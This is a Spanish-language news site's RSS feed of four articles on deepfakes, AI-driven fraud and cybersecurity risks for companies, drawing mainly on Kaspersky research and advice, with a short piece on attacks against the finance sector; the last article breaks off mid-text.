<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>deepfakes &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/deepfakes/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Wed, 17 Dec 2025 12:43:52 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>La IA redefinirá la ciberseguridad empresarial en 2026</title>
		<link>https://www.todoenunclick.com/la-ia-redefinira-la-ciberseguridad-empresarial-en-2026/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Wed, 17 Dec 2025 12:43:46 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[2026]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[fraude]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[seguridad empresarial]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101475</guid>

					<description><![CDATA[<p><img width="1500" height="844" src="https://www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?w=1500&amp;ssl=1 1500w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=284%2C160&amp;ssl=1 284w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=597%2C336&amp;ssl=1 597w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=746%2C420&amp;ssl=1 746w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=640%2C360&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?resize=681%2C383&amp;ssl=1 681w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/12/Inteligencia-Artificial-Kaspersky.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1500px) 100vw, 1500px" /></p><!-- wp:paragraph -->
<p><strong>Kaspersky anticipa que las compañías deberán prepararse para un entorno donde los deepfakes, los modelos abiertos y la automatización de ataques impulsada por IA redefinirán la gestión del riesgo, el fraude y la protección operativa.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los expertos de Kaspersky han dado a conocer sus predicciones sobre el impacto que tendrá la inteligencia artificial en la ciberseguridad empresarial de cara a 2026. El análisis revela que la rápida adopción de modelos de lenguaje, sistemas generativos y agentes autónomos marcará un antes y un después tanto en las capacidades defensivas de las organizaciones como en el nivel de sofisticación de los ciberataques.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En un contexto donde la digitalización, el trabajo híbrido y la automatización ya forman parte del núcleo del negocio, la IA se convertirá en un factor crítico para la resiliencia operativa, la reputación corporativa y la continuidad del negocio.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":1} -->
<ol start="1" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Los deepfakes pasarán de ser una</strong><strong> amenaza emergente a riesgo estructural para las empresas</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>El hecho de que <strong>el </strong><strong>70</strong><strong>% de los latinoamericanos</strong> aún no sepa qué es un deepfake, según un <a href="https://latam.kaspersky.com/blog/lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental/23773/">estudio</a> de Kaspersky, representa una vulnerabilidad crítica para las empresas de la región. <strong>Así lo admite el 67% de los argentinos, 75% de peruanos, 72% de mexicanos y chilenos y el 66% de brasileros.</strong> Esta falta de conocimiento expone a colaboradores, proveedores y clientes a fraudes cada vez más creíbles, impulsados por inteligencia artificial, en un entorno donde la suplantación de identidad, la manipulación de voz e imagen y la ingeniería social avanzada evolucionan con mayor rapidez que la capacidad de detección humana.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En 2026, los deepfakes estarán plenamente integrados en el panorama de riesgos corporativos, por lo que las empresas deberán tratarlos como amenazas permanentes y no como incidentes aislados. La suplantación de ejecutivos, los fraudes financieros, la manipulación de comunicaciones internas y los ataques dirigidos a áreas críticas como finanzas, compras y dirección general convertirán el desconocimiento en un riesgo directo para la continuidad del negocio, la reputación corporativa y la estabilidad financiera.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":2} -->
<ol start="2" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Mayor calidad y accesibilidad del fraude basado en IA</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>La mejora drástica del audio sintético permitirá ataques de voz altamente realistas, mientras que las herramientas de generación serán cada vez más fáciles de usar. Esto incrementará los casos de fraude por suplantación, estafas en transferencias, manipulación de proveedores y ataques al área financiera.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":3} -->
<ol start="3" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Falta de estándares sólidos para identificar contenido generado por IA</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>La ausencia de sistemas universales realmente fiables para etiquetar e identificar contenido generado por inteligencia artificial obligará a las empresas a reforzar sus propios mecanismos de validación, verificación y control de autenticidad, especialmente en procesos críticos como autorizaciones de pago, comunicaciones internas y gestión de proveedores. Esto implicará ajustes en los flujos operativos y una mayor inversión en tecnología y capacitación.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":4} -->
<ol start="4" class="wp-block-list"><!-- wp:list-item -->
<li><strong>La IA como motor transversal en toda la cadena del ciberataque</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>La IA será clave para que los actores maliciosos automaticen tareas que antes requerían altos niveles de experiencia. Desde la planificación y el desarrollo de herramientas hasta la preparación de infraestructuras y la generación de comunicaciones fraudulentas, la inteligencia artificial reducirá drásticamente los tiempos y elevará la profesionalización de cada fase del ataque.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Como resultado, las operaciones serán más rápidas, más escalables y mucho más difíciles de rastrear, aumentando la capacidad de los atacantes para adaptarse, evadir defensas y lanzar campañas altamente personalizadas contra organizaciones específicas.</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true,"start":5} -->
<ol start="5" class="wp-block-list"><!-- wp:list-item -->
<li><strong>Regulación, secure by design y control corporativo del uso de la IA</strong></li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Si bien la reglamentación y las políticas públicas jugarán un rol clave en la adopción responsable de la inteligencia artificial, como lo reflejan los debates legislativos en Colombia y Brasil, la gestión efectiva de los riesgos asociados a la IA no puede depender exclusivamente del marco regulatorio. Las organizaciones deben anticiparse e integrar principios de security and privacy by design desde las etapas iniciales de diseño, desarrollo y despliegue de sistemas de IA, a lo largo de todo su ciclo de vida, con el fin de prevenir riesgos como la fuga de datos, manipulaciones, sesgos y usos indebidos de información sensible.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En este contexto, la decisión de permitir, limitar o restringir el uso de inteligencia artificial dentro de la organización deberá integrarse a la matriz de riesgos corporativa y formalizarse mediante políticas internas claras de gobernanza de IA. Procesos, datos y activos críticos o confidenciales no deben ser automatizados ni procesados mediante IA sin previas evaluaciones de impacto, controles técnicos robustos, auditorías periódicas y mecanismos de supervisión humana, a fin de garantizar un uso alineado con los principios regulatorios emergentes y asegurar que la empresa mantenga el control total sobre su información, sus decisiones y sus operaciones críticas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Lo más disruptivo de 2026 no será únicamente la capacidad técnica de los deepfakes o de la IA, sino el impacto directo que tendrán en la toma de decisiones empresariales. Las compañías deberán operar en un entorno en el que ya no será posible asumir que la información es auténtica por defecto, lo que obliga a repensar controles, políticas internas y modelos de seguridad desde el diseño. Esta pérdida de certeza transformará la forma en que se aprueban operaciones, se gestionan riesgos y se protege la confianza dentro de la organización. La verdadera ventaja competitiva ya no estará solo en detectar amenazas, sino en construir modelos de negocio resilientes, donde el uso de la IA esté alineado a la matriz de riesgo y la veracidad de la información deba ser verificada de manera sistemática”, </em><strong>asegura Claudio Martinelli, director general de las Américas en Kaspersky.</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Para evitar este tipo de vulnerabilidades, los expertos de Kaspersky recomiendan:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Control web para reducir riesgos desde la navegación:</strong> Las empresas deben contar con web control para regular a qué sitios y recursos pueden acceder los empleados. Esto permite bloquear páginas maliciosas, plataformas de fraude o herramientas de generación de contenido peligroso, reduciendo el riesgo de infecciones, estafas y fugas de información desde el origen.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Control de aplicaciones en equipos y celulares corporativos:</strong> Es clave aplicar application control en desktops y mobile device management (MDM) para decidir qué aplicaciones pueden usarse dentro de la empresa. Esto ayuda a bloquear apps legítimas que están siendo usadas para estafas cuando no son necesarias para la operación, evitando suplantaciones, fraudes y comunicaciones no autorizadas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Capacitación continua, el factor humano sigue siendo el mayor riesgo:</strong> Las empresas deben invertir en la educación constante de sus colaboradores, ya que el error humano sigue siendo la principal puerta de entrada de los ataques. Plataformas como <a href="https://latam.kaspersky.com/small-to-medium-business-security/security-awareness-platform">Kaspersky Automated Security Awareness Platform</a> (ASAP) de Kaspersky permiten entrenar a los empleados con cursos y simulaciones prácticas para reducir el riesgo de fraudes, phishing y suplantaciones basadas en IA.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->
<p><a href="https://www.todoenunclick.com/la-ia-redefinira-la-ciberseguridad-empresarial-en-2026/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101475</post-id>	</item>
		<item>
		<title>Estafadores usan IA para hacerse pasar por celebridades y estafar a sus víctimas</title>
		<link>https://www.todoenunclick.com/estafadores-usan-ia-para-hacerse-pasar-por-celebridades-y-estafar-a-sus-victimas/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Wed, 30 Apr 2025 21:32:46 +0000</pubDate>
				<category><![CDATA[Lifestyle]]></category>
		<category><![CDATA[celebridades]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[estafas]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=100403</guid>

					<description><![CDATA[<p><img width="601" height="474" src="https://www.todoenunclick.com/wp-content/uploads/2025/04/DeepFakes-Celebridades.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/04/DeepFakes-Celebridades.png?w=601&amp;ssl=1 601w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/04/DeepFakes-Celebridades.png?resize=203%2C160&amp;ssl=1 203w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/04/DeepFakes-Celebridades.png?resize=426%2C336&amp;ssl=1 426w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/04/DeepFakes-Celebridades.png?resize=533%2C420&amp;ssl=1 533w" sizes="(max-width: 601px) 100vw, 601px" /></p><!-- wp:paragraph -->
<p>Ante el auge de los engaños usando esta tecnología, los expertos de la compañía te ofrecen una guía para que puedas reconocer un video falso y evites caer en trampas digitales cada vez más sofisticadas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los estafadores digitales se han vuelto más peligrosos que nunca, y ahora no necesitan robar identidades… ¡las fabrican! Gracias al uso de deepfakes (videos o audios manipulados con Inteligencia Artificial para imitar de forma realista a una persona y lograr que diga o haga algo que nunca ocurrió), los ciberdelincuentes están suplantando a personajes famosos para ganar tu confianza y vaciar tus bolsillos. Si creías que podías confiar en lo que ves o escuchas en internet, es momento de pensarlo dos veces y de aprender a distinguir entre lo falso y la realidad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Y es que el uso de esta tecnología pone en aprietos a muchos internautas latinoamericanos, pues de acuerdo con <a href="https://latam.kaspersky.com/blog/investigacion-la-infodemia-y-su-impacto-en-la-vida-digital/21992/">una encuesta de Kaspersky</a>, 69% de los encuestados no sabe qué es un deepfake. Mientras que el 67% asegura que tampoco sabe cómo reconocer un contenido de este tipo. <strong><em>Así lo afirma el 68% de los argentinos, 71% de brasileros, 72% de colombianos, 70% de chilenos, 62% de mexicanos y el 57% de peruanos.</em></strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta falta de conocimiento es ampliamente aprovechada por los ciberdelincuentes, pues las estafas mediante mensajes falsos se incrementaron en 140% en América Latina en 2024 de acuerdo con el&nbsp; <a href="https://latam.kaspersky.com/about/press-releases/aumentan-en-140-las-estafas-mediante-mensajes-falsos-en-america-latina-revela-kaspersky">Panorama de Amenazas 2024 de Kaspersky</a>. <strong><em>Efectivamente, los países más afectados de la región por el incremento de estafas mediante mensajes falsos fueron Argentina (300%), Perú (360%), Brasil (267%), México (220%) y Bolivia (400%). Subrayando que, justamente, una de las principales tendencias es el uso de audios y videos manipulados con IA.</em></strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Los expertos de Kaspersky ofrecen una guía de sencillos pasos para identificar un video falso y evitar ser víctima de esta moderna forma de estafa:</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":100406,"sizeSlug":"full","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/04/Gioconda-con-mueca.jpg" alt="" class="wp-image-100406" /><figcaption class="wp-element-caption"><strong>Pon atención a los ojos y la boca:</strong> con frecuencia los deepfakes fallan en replicar los movimientos naturales de los ojos y la boca.</figcaption></figure>
<!-- /wp:image -->

<!-- wp:image {"id":100407,"sizeSlug":"full","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/04/Deepfake-Luz-distorsionada.jpg" alt="" class="wp-image-100407" /><figcaption class="wp-element-caption"><strong>Presta detalle a la iluminación y las sombras:</strong> es aconsejable revisar su la luz en el rostro es similar a la que tiene el resto del cuerpo o el fondo en el que el video ha sido grabado. Las sombras que no coinciden o los brillos extraños pueden delatar una edición artificial</figcaption></figure>
<!-- /wp:image -->

<!-- wp:image {"id":100408,"sizeSlug":"full","linkDestination":"none","align":"center"} -->
<figure class="wp-block-image aligncenter size-full"><img src="https://www.todoenunclick.com/wp-content/uploads/2025/04/Deepfake-Noticias.jpg" alt="" class="wp-image-100408" /><figcaption class="wp-element-caption"><strong>Verifica el origen del video:</strong> antes de dar crédito al video o de compartirlo, es importante que revises si proviene de una fuente oficial.</figcaption></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p><strong>Escucha el audio con atención:</strong> un tono de voz robótico, cortes bruscos o falta de locución natural son señales de que el audio fue generado o editado con IA. Hay incluso, algunas ediciones menos cuidadosas que sobreponen un audio al sonido original que no coincide con el movimiento de los labios.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“Estas estafas logran su objetivo no solo por lo sofisticado de la tecnología detrás de ellas, sino porque muchas personas aún desconocen su existencia o no saben cómo identificarlas. En un mundo digital que avanza a gran velocidad, mantenerse informado sobre cómo evoluciona la tecnología —y los riesgos que trae consigo— ya no es opcional, es una forma de autoprotección.” </em>señaló <strong>Isabel Manjarrez, Investigadora de seguridad del Equipo Global de Investigación y Análisis de Kaspersky</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p></p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/estafadores-usan-ia-para-hacerse-pasar-por-celebridades-y-estafar-a-sus-victimas/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">100403</post-id>	</item>
		<item>
		<title>Ciberataques en finanzas: 53% de empresas afectada</title>
		<link>https://www.todoenunclick.com/ciberataques-en-finanzas-53-de-empresas-afectada/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Thu, 30 Jan 2025 16:38:28 +0000</pubDate>
				<category><![CDATA[Empresas y Negocios]]></category>
		<category><![CDATA[ataques]]></category>
		<category><![CDATA[Banca]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[Cloud Legion]]></category>
		<category><![CDATA[dato]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[Finanzas]]></category>
		<category><![CDATA[fintech]]></category>
		<category><![CDATA[fraude]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[nube]]></category>
		<category><![CDATA[Tenable]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=99979</guid>

					<description><![CDATA[<p><img width="951" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Ciberataques en finanzas: 53% de empresas afectada" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?w=951&amp;ssl=1 951w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=504%2C336&amp;ssl=1 504w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=768%2C512&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=630%2C420&amp;ssl=1 630w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/01/CloudLegion_El-53_-de-las-empresas-financieras-y-de-seguros-sufrieron-ciberataques-en-los-ultimos-tres-meses.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 951px) 100vw, 951px" /></p><!-- wp:paragraph -->
<p>La industria financiera y de seguros enfrenta una ola de <strong>ciberataques</strong> sin precedentes. La creciente adopción de <strong>la nube</strong> y el avance de la <strong>inteligencia artificial (IA)</strong> han ampliado la superficie de exposición, generando nuevos riesgos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según un informe de <strong>Tenable</strong>, empresa especializada en <strong>ciberseguridad</strong>, el <strong>53% de las entidades financieras</strong> sufrieron ataques en los últimos tres meses. En paralelo, <strong>Deloitte</strong> estima que la <strong>IA generativa</strong> hará que las pérdidas por fraude aumenten un <strong>32% anual hasta 2027</strong>, alcanzando los <strong>US$40.000 millones</strong> solo en <strong>Estados Unidos</strong>. Además, los incidentes con <strong>deep fakes</strong> en el sector <strong>fintech</strong> crecieron un <strong>700% en 2023</strong>.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Desafíos en la seguridad de la nube</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Según los expertos de <strong>Cloud Legion</strong>, las entidades financieras y de seguros enfrentan tres grandes retos en materia de <strong>seguridad cibernética</strong>:</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">1. Proteger datos con estrategias efectivas</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Los datos sensibles requieren un <strong>estricto control de riesgos</strong> y un monitoreo continuo para evitar vulnerabilidades.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">2. Equilibrar seguridad y funcionalidad</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La estrategia de <strong>ciberseguridad</strong> no debe afectar la operación del negocio ni la experiencia del cliente.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">3. Escasez de talento especializado</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El <strong>95% de las organizaciones</strong> reconoce falta de experiencia en <strong>seguridad de la nube</strong>, lo que complica la protección de sus infraestructuras.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">El papel clave de los socios tecnológicos</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Para <strong>Christian Ibiri</strong>, CEO de <strong>Cloud Legion</strong>, el gran problema radica en <strong>identidades inseguras y errores de configuración</strong>. "<em>Los principales riesgos para la infraestructura de nube suelen ser las identidades inseguras y los problemas de configuración. Por eso, resulta fundamental el acompañamiento de un socio tecnológico experto, que conozca en profundidad tanto la industria como las nuevas tecnologías, que evite esos problemas comunes y que, además, pueda anticipar las próximas jugadas de los ciberatacantes</em>", concluye.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Conclusión</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El sector financiero debe reforzar sus estrategias de <strong>ciberseguridad</strong> para enfrentar las amenazas actuales. La combinación de <strong>inteligencia artificial</strong>, adopción de <strong>la nube</strong> y la falta de personal capacitado hacen que la seguridad digital sea un desafío crítico. Contar con <strong>socios tecnológicos</strong> especializados y adoptar estrategias proactivas puede marcar la diferencia en la protección de los datos y la confianza de los clientes.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/ciberataques-en-finanzas-53-de-empresas-afectada/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">99979</post-id>	</item>
		<item>
		<title>El lado oscuro de la IA: crece uso de deepfakes y clonación de voz</title>
		<link>https://www.todoenunclick.com/el-lado-oscuro-de-la-ia-crece-uso-de-deepfakes-y-clonacion-de-voz/</link>
		
		<dc:creator><![CDATA[Redacción Todo en un click]]></dc:creator>
		<pubDate>Wed, 28 Aug 2024 23:00:28 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[clonación de voz]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[Isabel Manjarrez]]></category>
		<category><![CDATA[Kaspersky]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=99267</guid>

					<description><![CDATA[<p><img width="888" height="401" src="https://www.todoenunclick.com/wp-content/uploads/2024/08/Isabel-Manjarrez-Kaspersky-.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/08/Isabel-Manjarrez-Kaspersky-.jpg?w=888&amp;ssl=1 888w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/08/Isabel-Manjarrez-Kaspersky-.jpg?resize=306%2C138&amp;ssl=1 306w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/08/Isabel-Manjarrez-Kaspersky-.jpg?resize=642%2C290&amp;ssl=1 642w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/08/Isabel-Manjarrez-Kaspersky-.jpg?resize=768%2C347&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/08/Isabel-Manjarrez-Kaspersky-.jpg?resize=640%2C289&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/08/Isabel-Manjarrez-Kaspersky-.jpg?resize=681%2C308&amp;ssl=1 681w" sizes="auto, (max-width: 888px) 100vw, 888px" /></p><!-- wp:paragraph -->
<p>Kaspersky detectó que existe una alta demanda de contenido multimedia falso, convincente y de alta calidad, en el mercado negro de la web.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En el último año, la generación de contenido falso o <em>deepfakes</em> ha experimentado un gran desarrollo. Ya no solo se trata de fotos y videos alterados con Inteligencia Artificial (IA), sino de una tecnología mucho más madura que ahora está apuntando a la falsificación de voz, también conocida como <em>deepvoice</em>. Los expertos de Kaspersky alertan que estas innovaciones ya son utilizadas para evadir controles de seguridad, por ejemplo, aprovechando datos biométricos vulnerados; así como para manipular información en línea y cometer otros ataques cibernéticos. Esto ha provocado el crecimiento del mercado negro de los <em>deepfakes</em>, donde el costo del contenido puede oscilar entre $300 a $20,000 dólares por minuto, dependiendo su calidad y complejidad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>De acuerdo con <strong>Isabel Manjarrez, Investigadora de seguridad del Equipo Global de Investigación y Análisis de Kaspersky</strong>, los avances en la Inteligencia Artificial Generativa y el aprendizaje automático han propiciado la creación de contenido multimedia falso cada vez más realista, ya que son tecnologías con la capacidad de aprender a partir de datos no estructurados, como el rostro o los movimientos humanos. Para crear<em> deepfakes</em>, la red generativa puede entrenarse con fotos reales de una persona y así generar un número infinito de imágenes convincentes de ella para integrarlas en un video.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Estas mismas técnicas de aprendizaje automático pueden emplearse para desarrollar contenidos de voz artificial y, mientras la tecnología siga expandiéndose, podría ser explotada por los estafadores para crear contenidos engañosos de audio aún más accesibles; lamentablemente, las personas cuyas muestras de voz o video están disponibles en Internet, como celebridades y figuras públicas, pueden ser más propensas a ser víctimas de suplantación. Ya que se prevé que su evolución continúe, los <em>deepfakes</em> ya <a href="https://www.weforum.org/agenda/2024/02/4-ways-to-future-proof-against-deepfakes-in-2024-and-beyond/">se han catalogado</a> como uno de los usos más preocupantes de la Inteligencia Artificial.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Y es que, mientras se han encontrado beneficios para ciertos campos, por ejemplo el de marketing, con nuevas herramientas de IA <a href="https://newsroom.tiktok.com/es-latam/tiktok-anuncia-symphony-avatars-marketing-inteligencia-artificial">como la de TikTok</a>, que permitirá a marcas y creadores</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>generar&nbsp;avatares de personas reales para producir anuncios en múltiples idiomas, el uso de <em>deepfakes</em> con propósitos maliciosos ha perjudicado a otros sectores, incluido el bancario. Por ejemplo, la suplantación de identidad con <em>deepfakes</em> ha jugado un papel importante en fraudes financieros con tácticas y aplicaciones capaces de eludir los mecanismos de verificación biométrica, empleados ya por distintas entidades financieras, permitiendo a los atacantes obtener acceso no autorizado a cuentas bancarias e información confidencial.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>A pesar de disponer abiertamente de herramientas de creación de <em>deepfakes</em>, los delincuentes buscan creadores que puedan producir contenido realista, de alta calidad e incluso en tiempo real, dado que simular movimientos, expresiones faciales o voces de manera fluida y natural es un reto para los algoritmos que deben capturar y reproducir detalles muy específicos. Por eso, existe un mercado específico de <em>deepfakes</em> en la <em>Darknet</em>, donde criminales ofrecen servicios para crear contenido falso y hasta tutoriales con consejos sobre cómo seleccionar el material de origen o cómo intercambiar rostros y voces para generar una falsificación convincente.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
